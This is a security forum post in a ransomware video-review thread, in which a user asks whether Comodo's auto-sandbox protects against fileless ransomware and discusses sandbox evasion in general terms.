Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
More Fun with Ransomware Part 5
Message
<blockquote data-quote="1qay1qay" data-source="post: 513937" data-attributes="member: 51885"><p>Cruelsister, first things first - thanks for your knowledge and no BS answer !</p><p></p><p><strong>1). first off, remember to set CF at the Proactive configuration to block things from any location.</strong></p><p></p><p>This is my main question : can auto sandbox (default deny ALL unknown) help in this fileless attack or not ?</p><p></p><p>Since i did not see any fileless infection in action (and i hope that will stay so regard live attack ... i would like to see one only in youre video) i would like to know if payload does get written at any stage on disk or is really everything made in ram - as name says - file less ?</p><p></p><p>Until now i did follow your recommendation and did not use HIPS - but Proactive setting use HIPS if i remember correctly ?</p><p></p><p></p><p>2). <strong>When considering fileless malware, even though the mechanism of action of this type of malware varies- many hide out in RAM and from there inject into legit processes, something like POWELIKS will target the registry, Phasebot uses Powershell).</strong></p><p></p><p>So with your expert knowledge: is it possibile to create/generate and finally start crypto-xxx (and finally sucessfully encrypt user files on hd) without ANY payload written to hard disk BEFORE actual encryption of user files on hard disk starts ?</p><p></p><p><strong>3). But no matter what the mechanism is, the spawned stuff, no matter if it is Powershell or a hollowed svchost, would still be contained within the sandbox and suppressed from doing systemic damage. </strong></p><p></p><p>If i understands Comodo FW correctly : this is true ONLY if i run any browser in sandbox (with green border) - correct ? But If i run browser normaly and get this exploit my files will be encrypted - comodo autosandbox with "default deny ALL unknown from ALL sources " will not help me since there will not be any file to block - everything will be executed in memory - do i get this correct ( even if we asume that malware does need contact with CC and will send request for a unique key before start encryption - that shuld be blocked with FW - but in fileless scenario this request will still be made from "trusted" browser and will not be blocked ... ) ?</p><p></p><p><strong>5). Time Delay method of Sandbox evasion- one of the standard methods used to trick a person to run a file outside the box. More popular is the dll search.</strong></p><p></p><p>So i suppose that we can say that making any rating and decision of unknown file based only on sandbox behaviour is Russian roulette (and this time in real sense of words ... with big R )</p></blockquote><p></p>
[QUOTE="1qay1qay, post: 513937, member: 51885"] Cruelsister, first things first - thanks for your knowledge and no BS answer ! [B]1). first off, remember to set CF at the Proactive configuration to block things from any location.[/B] This is my main question : can auto sandbox (default deny ALL unknown) help in this fileless attack or not ? Since i did not see any fileless infection in action (and i hope that will stay so regard live attack ... i would like to see one only in youre video) i would like to know if payload does get written at any stage on disk or is really everything made in ram - as name says - file less ? Until now i did follow your recommendation and did not use HIPS - but Proactive setting use HIPS if i remember correctly ? 2). [B]When considering fileless malware, even though the mechanism of action of this type of malware varies- many hide out in RAM and from there inject into legit processes, something like POWELIKS will target the registry, Phasebot uses Powershell).[/B] So with your expert knowledge: is it possibile to create/generate and finally start crypto-xxx (and finally sucessfully encrypt user files on hd) without ANY payload written to hard disk BEFORE actual encryption of user files on hard disk starts ? [B]3). But no matter what the mechanism is, the spawned stuff, no matter if it is Powershell or a hollowed svchost, would still be contained within the sandbox and suppressed from doing systemic damage. [/B] If i understands Comodo FW correctly : this is true ONLY if i run any browser in sandbox (with green border) - correct ? But If i run browser normaly and get this exploit my files will be encrypted - comodo autosandbox with "default deny ALL unknown from ALL sources " will not help me since there will not be any file to block - everything will be executed in memory - do i get this correct ( even if we asume that malware does need contact with CC and will send request for a unique key before start encryption - that shuld be blocked with FW - but in fileless scenario this request will still be made from "trusted" browser and will not be blocked ... ) ? [B]5). Time Delay method of Sandbox evasion- one of the standard methods used to trick a person to run a file outside the box. More popular is the dll search.[/B] So i suppose that we can say that making any rating and decision of unknown file based only on sandbox behaviour is Russian roulette (and this time in real sense of words ... with big R ) [/QUOTE]
Insert quotes…
Verification
Post reply
Top